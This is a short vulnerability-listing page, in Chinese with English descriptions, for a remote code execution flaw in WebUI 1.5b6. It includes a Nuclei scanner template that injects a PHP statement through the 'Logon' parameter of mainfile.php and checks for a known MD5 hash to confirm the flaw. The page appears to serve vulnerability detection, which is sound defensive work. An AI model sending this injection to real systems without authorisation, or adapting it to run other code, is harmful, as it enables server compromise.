webui-rce: WebUI 1.5b6 - Remote Code Execution

日期: 2025-08-01 | 影响软件: WebUI | POC: 已公开

漏洞描述

WebUI 1.5b6 is vulnerable to remote code execution because the 'mainfile.php' endpoint allows remote attackersto execute arbitrary code via the 'Logon' parameter.

PoC代码[已公开]

id: webui-rce

info:
  name: WebUI 1.5b6 - Remote Code Execution
  author: pikpikcu
  severity: critical
  description: WebUI 1.5b6 is vulnerable to remote code execution because the 'mainfile.php' endpoint allows remote attackersto execute arbitrary code via the 'Logon' parameter.
  reference:
    - https://www.exploit-db.com/exploits/36821
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-77
  metadata:
    max-request: 1
  tags: webui,rce,edb,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "c5b3d7397a90f42d222f7ed9408c0dc6"
        part: body

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100c2607a103b71aba735b082bf1be62ff391960f1685e13b82e10d3691c2a7920c022100f994b4246a676fcc6db9900f87fc11885041e589c25c5e900bd14133460f33aa:922c64590222798bb761d5b6d8e72950

相关漏洞推荐